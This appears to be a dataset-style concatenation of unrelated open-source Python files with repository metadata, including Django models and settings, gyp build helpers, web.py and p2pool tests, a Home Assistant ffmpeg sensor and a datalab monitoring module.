%s %s" % (user, env.local_install)) with cd(env.local_install): result = env.safe_run_output("pwd") env.local_install = result
ionelmc/django-admin-customizer
refs/heads/master
tests/test_app/models.py
1
from django import VERSION from admin_customizer.fields import OrderPreservingManyToManyField from django.db import models class Author(models.Model): name = models.CharField(max_length=100) class Book(models.Model): name = models.CharField(max_length=100) created = models.DateTimeField(auto_now_add=True) authors = OrderPreservingManyToManyField(Author) class BookNote(models.Model): book = models.ForeignKey("Book", null=True) notes = models.TextField()
klim-iv/phantomjs-qt5
refs/heads/qt5
src/breakpad/src/tools/gyp/pylib/gyp/common.py
137
#!/usr/bin/python # Copyright (c) 2009 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import errno import filecmp import os.path import re import tempfile import sys def ExceptionAppend(e, msg): """Append a message to the given exception's message.""" if not e.args: e.args = (msg,) elif len(e.args) == 1: e.args = (str(e.args[0]) + ' ' + msg,) else: e.args = (str(e.args[0]) + ' ' + msg,) + e.args[1:] def ParseQualifiedTarget(target): # Splits a qualified target into a build file, target name and toolset. # NOTE: rsplit is used to disambiguate the Windows drive letter separator. target_split = target.rsplit(':', 1) if len(target_split) == 2: [build_file, target] = target_split else: build_file = None target_split = target.rsplit('#', 1) if len(target_split) == 2: [target, toolset] = target_split else: toolset = None return [build_file, target, toolset] def ResolveTarget(build_file, target, toolset): # This function resolves a target into a canonical form: # - a fully defined build file, either absolute or relative to the current # directory # - a target name # - a toolset # # build_file is the file relative to which 'target' is defined. # target is the qualified target. # toolset is the default toolset for that target. [parsed_build_file, target, parsed_toolset] = ParseQualifiedTarget(target) if parsed_build_file: if build_file: # If a relative path, parsed_build_file is relative to the directory # containing build_file. If build_file is not in the current directory, # parsed_build_file is not a usable path as-is. Resolve it by # interpreting it as relative to build_file. If parsed_build_file is # absolute, it is usable as a path regardless of the current directory, # and os.path.join will return it as-is. build_file = os.path.normpath(os.path.join(os.path.dirname(build_file), parsed_build_file)) else: build_file = parsed_build_file if parsed_toolset: toolset = parsed_toolset return [build_file, target, toolset] def BuildFile(fully_qualified_target): # Extracts the build file from the fully qualified target. return ParseQualifiedTarget(fully_qualified_target)[0] def QualifiedTarget(build_file, target, toolset): # "Qualified" means the file that a target was defined in and the target # name, separated by a colon, suffixed by a # and the toolset name: # /path/to/file.gyp:target_name#toolset fully_qualified = build_file + ':' + target if toolset: fully_qualified = fully_qualified + '#' + toolset return fully_qualified def RelativePath(path, relative_to): # Assuming both |path| and |relative_to| are relative to the current # directory, returns a relative path that identifies path relative to # relative_to. # Convert to absolute (and therefore normalized paths). path = os.path.abspath(path) relative_to = os.path.abspath(relative_to) # Split the paths into components. path_split = path.split(os.path.sep) relative_to_split = relative_to.split(os.path.sep) # Determine how much of the prefix the two paths share. prefix_len = len(os.path.commonprefix([path_split, relative_to_split])) # Put enough ".." components to back up out of relative_to to the common # prefix, and then append the part of path_split after the common prefix. relative_split = [os.path.pardir] * (len(relative_to_split) - prefix_len) + \ path_split[prefix_len:] if len(relative_split) == 0: # The paths were the same. return '' # Turn it back into a string and we're done. return os.path.join(*relative_split) def FixIfRelativePath(path, relative_to): # Like RelativePath but returns |path| unchanged if it is absolute. if os.path.isabs(path): return path return RelativePath(path, relative_to) def UnrelativePath(path, relative_to): # Assuming that |relative_to| is relative to the current directory, and |path| # is a path relative to the dirname of |relative_to|, returns a path that # identifies |path| relative to the current directory. rel_dir = os.path.dirname(relative_to) return os.path.normpath(os.path.join(rel_dir, path)) # re objects used by EncodePOSIXShellArgument. See IEEE 1003.1 XCU.2.2 at # http://www.opengroup.org/onlinepubs/009695399/utilities/xcu_chap02.html#tag_02_02 # and the documentation for various shells. # _quote is a pattern that should match any argument that needs to be quoted # with double-quotes by EncodePOSIXShellArgument. It matches the following # characters appearing anywhere in an argument: # \t, \n, space parameter separators # # comments # $ expansions (quoted to always expand within one argument) # % called out by IEEE 1003.1 XCU.2.2 # & job control # ' quoting # (, ) subshell execution # *, ?, [ pathname expansion # ; command delimiter # <, >, | redirection # = assignment # {, } brace expansion (bash) # ~ tilde expansion # It also matches the empty string, because "" (or '') is the only way to # represent an empty string literal argument to a POSIX shell. # # This does not match the characters in _escape, because those need to be # backslash-escaped regardless of whether they appear in a double-quoted # string. _quote = re.compile('[\t\n #$%&\'()*;<=>?[{|}~]|^$') # _escape is a pattern that should match any character that needs to be # escaped with a backslash, whether or not the argument matched the _quote # pattern. _escape is used with re.sub to backslash anything in _escape's # first match group, hence the (parentheses) in the regular expression. # # _escape matches the following characters appearing anywhere in an argument: # " to prevent POSIX shells from interpreting this character for quoting # \ to prevent POSIX shells from interpreting this character for escaping # ` to prevent POSIX shells from interpreting this character for command # substitution # Missing from this list is $, because the desired behavior of # EncodePOSIXShellArgument is to permit parameter (variable) expansion. # # Also missing from this list is !, which bash will interpret as the history # expansion character when history is enabled. bash does not enable history # by default in non-interactive shells, so this is not thought to be a problem. # ! was omitted from this list because bash interprets "\!" as a literal string # including the backslash character (avoiding history expansion but retaining # the backslash), which would not be correct for argument encoding. Handling # this case properly would also be problematic because bash allows the history # character to be changed with the histchars shell variable. Fortunately, # as history is not enabled in non-interactive shells and # EncodePOSIXShellArgument is only expected to encode for non-interactive # shells, there is no room for error here by ignoring !. _escape = re.compile(r'(["\\`])') def EncodePOSIXShellArgument(argument): """Encodes |argument| suitably for consumption by POSIX shells. argument may be quoted and escaped as necessary to ensure that POSIX shells treat the returned value as a literal representing the argument passed to this function. Parameter (variable) expansions beginning with $ are allowed to remain intact without escaping the $, to allow the argument to contain references to variables to be expanded by the shell. """ if not isinstance(argument, str): argument = str(argument) if _quote.search(argument): quote = '"' else: quote = '' encoded = quote + re.sub(_escape, r'\\\1', argument) + quote return encoded def EncodePOSIXShellList(list): """Encodes |list| suitably for consumption by POSIX shells. Returns EncodePOSIXShellArgument for each item in list, and joins them together using the space character as an argument separator. """ encoded_arguments = [] for argument in list: encoded_arguments.append(EncodePOSIXShellArgument(argument)) return ' '.join(encoded_arguments) def DeepDependencyTargets(target_dicts, roots): """Returns the recursive list of target dependencies. """ dependencies = set() for r in roots: spec = target_dicts[r] r_deps = list(set((spec.get('dependencies', []) + spec.get('dependencies_original', [])))) for d in r_deps: if d not in roots: dependencies.add(d) for d in DeepDependencyTargets(target_dicts, r_deps): if d not in roots: dependencies.add(d) return list(dependencies) def BuildFileTargets(target_list, build_file): """From a target_list, returns the subset from the specified build_file. """ return [p for p in target_list if BuildFile(p) == build_file] def AllTargets(target_list, target_dicts, build_file): """Returns all targets (direct and dependencies) for the specified build_file. """ bftargets = BuildFileTargets(target_list, build_file) deptargets = DeepDependencyTargets(target_dicts, bftargets) return bftargets + deptargets def WriteOnDiff(filename): """Write to a file only if the new contents differ. Arguments: filename: name of the file to potentially write to. Returns: A file like object which will write to temporary file and only overwrite the target if it differs (on close). """ class Writer: """Wrapper around file which only covers the target if it differs.""" def __init__(self): # Pick temporary file. tmp_fd, self.tmp_path = tempfile.mkstemp( suffix='.tmp', prefix=os.path.split(filename)[1] + '.gyp.', dir=os.path.split(filename)[0]) try: self.tmp_file = os.fdopen(tmp_fd, 'wb') except Exception: # Don't leave turds behind. os.unlink(self.tmp_path) raise def __getattr__(self, attrname): # Delegate everything else to self.tmp_file return getattr(self.tmp_file, attrname) def close(self): try: # Close tmp file. self.tmp_file.close() # Determine if different. same = False try: same = filecmp.cmp(self.tmp_path, filename, False) except OSError, e: if e.errno != errno.ENOENT: raise if same: # The new file is identical to the old one, just get rid of the new # one. os.unlink(self.tmp_path) else: # The new file is different from the old one, or there is no old one. # Rename the new file to the permanent name. # # tempfile.mkstemp uses an overly restrictive mode, resulting in a # file that can only be read by the owner, regardless of the umask. # There's no reason to not respect the umask here, which means that # an extra hoop is required to fetch it and reset the new file's mode. # # No way to get the umask without setting a new one? Set a safe one # and then set it back to the old value. umask = os.umask(077) os.umask(umask) os.chmod(self.tmp_path, 0666 & ~umask) if sys.platform == 'win32' and os.path.exists(filename): # NOTE: on windows (but not cygwin) rename will not replace an # existing file, so it must be preceded with a remove. Sadly there # is no way to make the switch atomic. os.remove(filename) os.rename(self.tmp_path, filename) except Exception: # Don't leave turds behind. os.unlink(self.tmp_path) raise return Writer() # From Alex Martelli, # http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/52560 # ASPN: Python Cookbook: Remove duplicates from a sequence # First comment, dated 2001/10/13. # (Also in the printed Python Cookbook.) def uniquer(seq, idfun=None): if idfun is None: def idfun(x): return x seen = {} result = [] for item in seq: marker = idfun(item) if marker in seen: continue seen[marker] = 1 result.append(item) return result
MartinThoma/algorithms
refs/heads/master
sorting/dask-sort.py
1
import dask import dask.dataframe as dd input_file = "numbers-large.txt" output_file = "numbers-large-sorted-dask.txt" blocksize = 1_000_000 print("Create ddf") ddf = dd.read_csv(input_file, header=None, blocksize=blocksize) print("Sort") ddf_sorted = ddf.set_index(0) print("Write") fut = ddf_sorted.to_csv(output_file, compute=False, single_file=True, header=None) dask.compute(fut) print("Stop")
googleinterns/power-data-graphing-intern-2020
refs/heads/master
backend/level_slice_test.py
1
# Copyright 2020 Google LLC # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================= """A Test module for LevelSlice Class.""" # pylint: disable=W0212 import os from math import ceil from tempfile import NamedTemporaryFile import pytest from downsample import strategy_reducer from level_slice import LevelSlice from utils import convert_to_csv class TestLevelClass: """Test Class for Testing LevelSlice""" @pytest.fixture def test_records1(self): return [ [1573149236256988, 100, 'PPX_ASYS'], [1573149236257088, 100, 'PPX_ASYS'], [1573149236257188, 300, 'PPX_ASYS'], [1573149236257288, 100, 'PPX_ASYS'], [1573149236257388, 100, 'PPX_ASYS'], [1573149236257488, 100, 'PPX_ASYS'], [1573149236257588, 100, 'PPX_ASYS'], [1573149236257688, 100, 'PPX_ASYS'], [1573149236257788, 5, 'PPX_ASYS'], [1573149236257888, 100, 'PPX_ASYS'] ] @pytest.fixture def test_records2(self): return [ [1573149236257988, 100, 'SYS'], [1573149236258888, 100, 'SYS'], [1573149236259888, 100, 'SYS'], [1573149236260888, 100, 'SYS'], [1573149236261888, 100, 'SYS'], [1573149236262888, 100, 'SYS'], [1573149236263888, 100, 'SYS'], [1573149236264888, 100, 'SYS'], [1573149236265888, 100, 'SYS'], [1573149236266888, 100, 'SYS'], [1573149236267888, 100, 'SYS'], [1573149236268888, 100, 'SYS'], [1573149236269888, 100, 'SYS'], ] def write_to_tmpfile(self, records): """Writes records to tmp file. Args: records: A list of records. Returns: An IO object. """ tmpfile = NamedTemporaryFile() with open(tmpfile.name, 'w') as filewriter: data_csv = convert_to_csv(records) filewriter.write(data_csv) assert os.path.exists(tmpfile.name) return tmpfile def test_read(self, test_records1): """Tests if read records same as saved ones.""" tmpfile = self.write_to_tmpfile(test_records1) test_slice = LevelSlice(tmpfile.name) test_slice.read() assert test_slice._records['PPX_ASYS'] == test_records1 tmpfile.close() def test_empty_read(self): """Tests read behavior when none filename is supplied.""" tmpfile = self.write_to_tmpfile([]) test_slice = LevelSlice(tmpfile.name) assert test_slice._records == {} test_slice.read() assert test_slice._records == {} def test_add_records_single_channel(self, test_records1): """Tests if right records added on calling add_records, add single channel.""" formatted_test_records = {test_records1[0][2]: test_records1} test_slice = LevelSlice('dummy') assert test_slice._records == {} expected_test_records = formatted_test_records test_slice.add_records(formatted_test_records) assert test_slice._records == expected_test_records expected_test_records = { test_records1[0][2]: test_records1+test_records1} test_slice.add_records(formatted_test_records) assert test_slice._records == expected_test_records def test_add_records_multi_channel(self, test_records1, test_records2): """Tests if right records added on calling add_records, add multiple channels.""" formatted_test_records = { test_records1[0][2]: test_records1, test_records2[0][2]: test_records2, } test_slice = LevelSlice('dummy') assert test_slice._records == {} expected_test_records = formatted_test_records test_slice.add_records(formatted_test_records) assert test_slice._records == expected_test_records def test_get_start(self, test_records1): """Tests start time is earliest in all records.""" tmpfile = self.write_to_tmpfile(test_records1) test_slice = LevelSlice(tmpfile.name) assert test_slice._start == -1 test_slice.read() assert test_slice.get_first_timestamp() == test_records1[0][0] tmpfile.close() def test_save_member(self, test_records1): """Tests if object member records saved.""" tmpfile = NamedTemporaryFile() test_save_slice = LevelSlice(tmpfile.name) formatted_test_records = {test_records1[0][2]: test_records1} test_save_slice.add_records(formatted_test_records) test_save_slice.save() test_read_slice = LevelSlice(tmpfile.name) test_read_slice.read() assert test_read_slice._records == formatted_test_records tmpfile.close() def test_save_parameter(self, test_records1): """Tests if parameter records saved.""" tmpfile = NamedTemporaryFile() test_save_slice = LevelSlice(tmpfile.name) formatted_test_records = {test_records1[0][2]: test_records1} test_save_slice.save(test_records1) test_read_slice = LevelSlice(tmpfile.name) test_read_slice.read() assert test_read_slice._records == formatted_test_records tmpfile.close() @pytest.mark.parametrize('strategy', ['max', 'min', 'avg']) @pytest.mark.parametrize('factor', [1, 2, 4, 6, 8, 10, 100]) def test_downsample_factor(self, test_records1, strategy, factor): """Tests if right downsample strategy is applied, using downsample factor.""" tmpfile = self.write_to_tmpfile(test_records1) test_slice = LevelSlice(tmpfile.name) test_slice.read() downsampled = test_slice.downsample(strategy, factor) assert downsampled['PPX_ASYS'] == strategy_reducer( test_records1, strategy, factor) tmpfile.close() @pytest.mark.parametrize('strategy', ['max', 'min', 'avg']) @pytest.mark.parametrize('max_records', [1, 2, 3, 4, 6, 8, 10, 100]) def test_downsample_max_records(self, test_records1, strategy, max_records): """Tests if right downsample strategy is applied, using max records.""" tmpfile = self.write_to_tmpfile(test_records1) test_slice = LevelSlice(tmpfile.name) test_slice.read() downsampled = test_slice.downsample(strategy, max_records=max_records) downsample_factor = ceil(len(test_records1)/max_records) assert downsampled['PPX_ASYS'] == strategy_reducer( test_records1, strategy, downsample_factor) tmpfile.close()
happyleavesaoc/home-assistant
refs/heads/dev
homeassistant/components/binary_sensor/ffmpeg_motion.py
10
""" Provides a binary sensor which is a collection of ffmpeg tools. For more details about this platform, please refer to the documentation at https://home-assistant.io/components/binary_sensor.ffmpeg_motion/ """ import asyncio import logging import voluptuous as vol from homeassistant.core import callback import homeassistant.helpers.config_validation as cv from homeassistant.components.binary_sensor import ( BinarySensorDevice, PLATFORM_SCHEMA) from homeassistant.components.ffmpeg import ( FFmpegBase, DATA_FFMPEG, CONF_INPUT, CONF_EXTRA_ARGUMENTS, CONF_INITIAL_STATE) from homeassistant.const import CONF_NAME DEPENDENCIES = ['ffmpeg'] _LOGGER = logging.getLogger(__name__) CONF_RESET = 'reset' CONF_CHANGES = 'changes' CONF_REPEAT = 'repeat' CONF_REPEAT_TIME = 'repeat_time' DEFAULT_NAME = 'FFmpeg Motion' DEFAULT_INIT_STATE = True PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({ vol.Required(CONF_INPUT): cv.string, vol.Optional(CONF_INITIAL_STATE, default=DEFAULT_INIT_STATE): cv.boolean, vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string, vol.Optional(CONF_EXTRA_ARGUMENTS): cv.string, vol.Optional(CONF_RESET, default=10): vol.All(vol.Coerce(int), vol.Range(min=1)), vol.Optional(CONF_CHANGES, default=10): vol.All(vol.Coerce(float), vol.Range(min=0, max=99)), vol.Inclusive(CONF_REPEAT, 'repeat'): vol.All(vol.Coerce(int), vol.Range(min=1)), vol.Inclusive(CONF_REPEAT_TIME, 'repeat'): vol.All(vol.Coerce(int), vol.Range(min=1)), }) @asyncio.coroutine def async_setup_platform(hass, config, async_add_devices, discovery_info=None): """Set up the FFmpeg binary moition sensor.""" manager = hass.data[DATA_FFMPEG] if not manager.async_run_test(config.get(CONF_INPUT)): return entity = FFmpegMotion(hass, manager, config) async_add_devices([entity]) class FFmpegBinarySensor(FFmpegBase, BinarySensorDevice): """A binary sensor which use FFmpeg for noise detection.""" def __init__(self, config): """Init for the binary sensor noise detection.""" super().__init__(config.get(CONF_INITIAL_STATE)) self._state = False self._config = config self._name = config.get(CONF_NAME) @callback def _async_callback(self, state): """HA-FFmpeg callback for noise detection.""" self._state = state self.hass.async_add_job(self.async_update_ha_state()) @property def is_on(self): """Return true if the binary sensor is on.""" return self._state @property def name(self): """Return the name of the entity.""" return self._name class FFmpegMotion(FFmpegBinarySensor): """A binary sensor which use FFmpeg for noise detection.""" def __init__(self, hass, manager, config): """Initialize FFmpeg motion binary sensor.""" from haffmpeg import SensorMotion super().__init__(config) self.ffmpeg = SensorMotion( manager.binary, hass.loop, self._async_callback) @asyncio.coroutine def _async_start_ffmpeg(self, entity_ids): """Start a FFmpeg instance. This method is a coroutine. """ if entity_ids is not None and self.entity_id not in entity_ids: return # init config self.ffmpeg.set_options( time_reset=self._config.get(CONF_RESET), time_repeat=self._config.get(CONF_REPEAT_TIME, 0), repeat=self._config.get(CONF_REPEAT, 0), changes=self._config.get(CONF_CHANGES), ) # run yield from self.ffmpeg.open_sensor( input_source=self._config.get(CONF_INPUT), extra_cmd=self._config.get(CONF_EXTRA_ARGUMENTS), ) @property def device_class(self): """Return the class of this sensor, from DEVICE_CLASSES.""" return 'motion'
flashycud/timestack
refs/heads/master
django/conf/project_template/settings.py
5
# Django settings for {{ project_name }} project. DEBUG = True TEMPLATE_DEBUG = DEBUG ADMINS = ( # ('Your Name', 'your_email@example.com'), ) MANAGERS = ADMINS DATABASES = { 'default': { 'ENGINE': 'django.db.backends.', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'. 'NAME': '', # Or path to database file if using sqlite3. 'USER': '', # Not used with sqlite3. 'PASSWORD': '', # Not used with sqlite3. 'HOST': '', # Set to empty string for localhost. Not used with sqlite3. 'PORT': '', # Set to empty string for default. Not used with sqlite3. } } # Local time zone for this installation. Choices can be found here: # http://en.wikipedia.org/wiki/List_of_tz_zones_by_name # although not all choices may be available on all operating systems. # On Unix systems, a value of None will cause Django to use the same # timezone as the operating system. # If running in a Windows environment this must be set to the same as your # system time zone. TIME_ZONE = 'America/Chicago' # Language code for this installation. All choices can be found here: # http://www.i18nguy.com/unicode/language-identifiers.html LANGUAGE_CODE = 'en-us' SITE_ID = 1 # If you set this to False, Django will make some optimizations so as not # to load the internationalization machinery. USE_I18N = True # If you set this to False, Django will not format dates, numbers and # calendars according to the current locale USE_L10N = True # Absolute filesystem path to the directory that will hold user-uploaded files. # Example: "/home/media/media.lawrence.com/media/" MEDIA_ROOT = '' # URL that handles the media served from MEDIA_ROOT. Make sure to use a # trailing slash. # Examples: "http://media.lawrence.com/media/", "http://example.com/media/" MEDIA_URL = '' # Absolute path to the directory static files should be collected to. # Don't put anything in this directory yourself; store your static files # in apps' "static/" subdirectories and in STATICFILES_DIRS. # Example: "/home/media/media.lawrence.com/static/" STATIC_ROOT = '' # URL prefix for static files. # Example: "http://media.lawrence.com/static/" STATIC_URL = '/static/' # URL prefix for admin static files -- CSS, JavaScript and images. # Make sure to use a trailing slash. # Examples: "http://foo.com/static/admin/", "/static/admin/". ADMIN_MEDIA_PREFIX = '/static/admin/' # Additional locations of static files STATICFILES_DIRS = ( # Put strings here, like "/home/html/static" or "C:/www/django/static". # Always use forward slashes, even on Windows. # Don't forget to use absolute paths, not relative paths. ) # List of finder classes that know how to find static files in # various locations. STATICFILES_FINDERS = ( 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', # 'django.contrib.staticfiles.finders.DefaultStorageFinder', ) # Make this unique, and don't share it with anybody. SECRET_KEY = '' # List of callables that know how to import templates from various sources. TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', # 'django.template.loaders.eggs.Loader', ) MIDDLEWARE_CLASSES = ( 'django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', ) ROOT_URLCONF = '{{ project_name }}.urls' TEMPLATE_DIRS = ( # Put strings here, like "/home/html/django_templates" or "C:/www/django/templates". # Always use forward slashes, even on Windows. # Don't forget to use absolute paths, not relative paths. ) INSTALLED_APPS = ( 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.sites', 'django.contrib.messages', 'django.contrib.staticfiles', # Uncomment the next line to enable the admin: # 'django.contrib.admin', # Uncomment the next line to enable admin documentation: # 'django.contrib.admindocs', ) # A sample logging configuration. The only tangible logging # performed by this configuration is to send an email to # the site admins on every HTTP 500 error. # See http://docs.djangoproject.com/en/dev/topics/logging for # more details on how to customize your logging configuration. LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'handlers': { 'mail_admins': { 'level': 'ERROR', 'class': 'django.utils.log.AdminEmailHandler' } }, 'loggers': { 'django.request':{ 'handlers': ['mail_admins'], 'level': 'ERROR', 'propagate': True, }, } }
MjAbuz/watchdog
refs/heads/master
vendor/webpy/test/application.py
3
import webtest import time import web import urllib data = """ import web urls = ("/", "%(classname)s") app = web.application(urls, globals(), autoreload=True) class %(classname)s: def GET(self): return "%(output)s" """ urls = ( "/iter", "do_iter", ) app = web.application(urls, globals()) class do_iter: def GET(self): yield 'hello, ' yield web.input(name='world').name POST = GET def write(filename, data): f = open(filename, 'w') f.write(data) f.close() class ApplicationTest(webtest.TestCase): def test_reloader(self): write('foo.py', data % dict(classname='a', output='a')) import foo app = foo.app self.assertEquals(app.request('/').data, 'a') # test class change time.sleep(1) write('foo.py', data % dict(classname='a', output='b')) self.assertEquals(app.request('/').data, 'b') # test urls change time.sleep(1) write('foo.py', data % dict(classname='c', output='c')) self.assertEquals(app.request('/').data, 'c') def testUppercaseMethods(self): urls = ("/", "hello") app = web.application(urls, locals()) class hello: def GET(self): return "hello" def internal(self): return "secret" response = app.request('/', method='internal') self.assertEquals(response.status, '405 Method Not Allowed') def testRedirect(self): urls = ( "/a", "redirect /hello/", "/b/(.*)", r"redirect /hello/\1", "/hello/(.*)", "hello" ) app = web.application(urls, locals()) class hello: def GET(self, name): name = name or 'world' return "hello " + name response = app.request('/a') self.assertEquals(response.status, '301 Moved Permanently') self.assertEquals(response.headers['Location'], 'http://0.0.0.0:8080/hello/') response = app.request('/a?x=2') self.assertEquals(response.status, '301 Moved Permanently') self.assertEquals(response.headers['Location'], 'http://0.0.0.0:8080/hello/?x=2') response = app.request('/b/foo?x=2') self.assertEquals(response.status, '301 Moved Permanently') self.assertEquals(response.headers['Location'], 'http://0.0.0.0:8080/hello/foo?x=2') def test_subdirs(self): urls = ( "/(.*)", "blog" ) class blog: def GET(self, path): return "blog " + path app_blog = web.application(urls, locals()) urls = ( "/blog", app_blog, "/(.*)", "index" ) class index: def GET(self, path): return "hello " + path app = web.application(urls, locals()) self.assertEquals(app.request('/blog/foo').data, 'blog foo') self.assertEquals(app.request('/foo').data, 'hello foo') def processor(handler): return web.ctx.path + ":" + handler() app.add_processor(processor) self.assertEquals(app.request('/blog/foo').data, '/blog/foo:blog foo') def test_subdomains(self): def create_app(name): urls = ("/", "index") class index: def GET(self): return name return web.application(urls, locals()) urls = ( "a.example.com", create_app('a'), "b.example.com", create_app('b'), ".*.example.com", create_app('*') ) app = web.subdomain_application(urls, locals()) def test(host, expected_result): result = app.request('/', host=host) self.assertEquals(result.data, expected_result) test('a.example.com', 'a') test('b.example.com', 'b') test('c.example.com', '*') test('d.example.com', '*') def test_redirect(self): urls = ( "/(.*)", "blog" ) class blog: def GET(self, path): if path == 'foo': raise web.seeother('/login', absolute=True) else: raise web.seeother('/bar') app_blog = web.application(urls, locals()) urls = ( "/blog", app_blog, "/(.*)", "index" ) class index: def GET(self, path): return "hello " + path app = web.application(urls, locals()) response = app.request('/blog/foo') self.assertEquals(response.headers['Location'], 'http://0.0.0.0:8080/login') response = app.request('/blog/foo', env={'SCRIPT_NAME': '/x'}) self.assertEquals(response.headers['Location'], 'http://0.0.0.0:8080/x/login') response = app.request('/blog/foo2') self.assertEquals(response.headers['Location'], 'http://0.0.0.0:8080/blog/bar') response = app.request('/blog/foo2', env={'SCRIPT_NAME': '/x'}) self.assertEquals(response.headers['Location'], 'http://0.0.0.0:8080/x/blog/bar') def test_processors(self): urls = ( "/(.*)", "blog" ) class blog: def GET(self, path): return 'blog ' + path state = web.storage(x=0, y=0) def f(): state.x += 1 app_blog = web.application(urls, locals()) app_blog.add_processor(web.loadhook(f)) urls = ( "/blog", app_blog, "/(.*)", "index" ) class index: def GET(self, path): return "hello " + path app = web.application(urls, locals()) def g(): state.y += 1 app.add_processor(web.loadhook(g)) app.request('/blog/foo') assert state.x == 1 and state.y == 1, repr(state) app.request('/foo') assert state.x == 1 and state.y == 2, repr(state) def testUnicodeInput(self): urls = ( "(/.*)", "foo" ) class foo: def GET(self, path): i = web.input(name='') return repr(i.name) def POST(self, path): if path == '/multipart': i = web.input(file={}) return i.file.value else: i = web.input() return repr(dict(i)) app = web.application(urls, locals()) def f(name): path = '/?' + urllib.urlencode({"name": name.encode('utf-8')}) self.assertEquals(app.request(path).data, repr(name)) f(u'\u1234') f(u'foo') response = app.request('/', method='POST', data=dict(name='foo')) self.assertEquals(response.data, "{'name': u'foo'}") data = '--boundary\r\nContent-Disposition: form-data; name="x"\r\nfoo\r\n--boundary\r\nContent-Disposition: form-data; name="file"; filename="a.txt"\r\nContent-Type: text/plain\r\n\r\na\r\n--boundary--\r\n' headers = {'Content-Type': 'multipart/form-data; boundary=boundary'} response = app.request('/multipart', method="POST", data=data, headers=headers) self.assertEquals(response.data, 'a') def testCustomNotFound(self): urls_a = ("/", "a") urls_b = ("/", "b") app_a = web.application(urls_a, locals()) app_b = web.application(urls_b, locals()) app_a.notfound = lambda: web.HTTPError("404 Not Found", {}, "not found 1") urls = ( "/a", app_a, "/b", app_b ) app = web.application(urls, locals()) def assert_notfound(path, message): response = app.request(path) self.assertEquals(response.status.split()[0], "404") self.assertEquals(response.data, message) assert_notfound("/a/foo", "not found 1") assert_notfound("/b/foo", "not found") app.notfound = lambda: web.HTTPError("404 Not Found", {}, "not found 2") assert_notfound("/a/foo", "not found 1") assert_notfound("/b/foo", "not found 2") def testIter(self): self.assertEquals(app.request('/iter').data, 'hello, world') self.assertEquals(app.request('/iter?name=web').data, 'hello, web') self.assertEquals(app.request('/iter', method='POST').data, 'hello, world') self.assertEquals(app.request('/iter', method='POST', data='name=web').data, 'hello, web') def testUnload(self): x = web.storage(a=0) urls = ( "/foo", "foo", "/bar", "bar" ) class foo: def GET(self): return "foo" class bar: def GET(self): raise web.notfound() app = web.application(urls, locals()) def unload(): x.a += 1 app.add_processor(web.unloadhook(unload)) app.request('/foo') self.assertEquals(x.a, 1) app.request('/bar') self.assertEquals(x.a, 2) if __name__ == '__main__': webtest.main()
narken/p2pool-altcoins
refs/heads/master
p2pool/test/util/test_expiring_dict.py
287
from twisted.internet import defer from twisted.trial import unittest from p2pool.util import deferral, expiring_dict class Test(unittest.TestCase): @defer.inlineCallbacks def test_expiring_dict1(self): e = expiring_dict.ExpiringDict(3, get_touches=True) e[1] = 2 yield deferral.sleep(1.5) assert 1 in e yield deferral.sleep(3) assert 1 not in e @defer.inlineCallbacks def test_expiring_dict2(self): e = expiring_dict.ExpiringDict(3, get_touches=True) e[1] = 2 yield deferral.sleep(2.25) e[1] yield deferral.sleep(2.25) assert 1 in e @defer.inlineCallbacks def test_expiring_dict3(self): e = expiring_dict.ExpiringDict(3, get_touches=False) e[1] = 2 yield deferral.sleep(2.25) e[1] yield deferral.sleep(2.25) assert 1 not in e
yebrahim/pydatalab
refs/heads/master
datalab/stackdriver/monitoring/_resource.py
5
# Copyright 2016 Google Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except # in compliance with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software distributed under the License # is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express # or implied. See the License for the specific language governing permissions and limitations under # the License. """Provides the ResourceDescriptors in the monitoring API.""" from __future__ import absolute_import from builtins import object import fnmatch import pandas from . import _utils class ResourceDescriptors(object): """ResourceDescriptors object for retrieving the resource descriptors.""" _DISPLAY_HEADERS = ('Resource type', 'Display name', 'Labels') def __init__(self, filter_string=None, project_id=None, context=None): """Initializes the ResourceDescriptors based on the specified filters. Args: filter_string: An optional filter expression describing the resource descriptors to be returned. project_id: An optional project ID or number to override the one provided by the context. context: An optional Context object to use instead of the global default. """ self._client = _utils.make_client(project_id, context) self._filter_string = filter_string self._descriptors = None def list(self, pattern='*'): """Returns a list of resource descriptors that match the filters. Args: pattern: An optional pattern to further filter the descriptors. This can include Unix shell-style wildcards. E.g. ``"aws*"``, ``"*cluster*"``. Returns: A list of ResourceDescriptor objects that match the filters. """ if self._descriptors is None: self._descriptors = self._client.list_resource_descriptors( filter_string=self._filter_string) return [resource for resource in self._descriptors if fnmatch.fnmatch(resource.type, pattern)] def as_dataframe(self, pattern='*', max_rows=None): """Creates a pandas dataframe from the descriptors that match the filters. Args: pattern: An optional pattern to further filter the descriptors. This can include Unix shell-style wildcards. E.g. ``"aws*"``, ``"*cluster*"``. max_rows: The maximum number of descriptors to return. If None, return all. Returns: A pandas dataframe containing matching resource descriptors. """ data = [] for i, resource in enumerate(self.list(pattern)): if max_rows is not None and i >= max_rows: break labels = ', '. join([l.key for l in resource.labels]) data.append([resource.type, resource.display_name, labels]) return pandas.DataFrame(data, 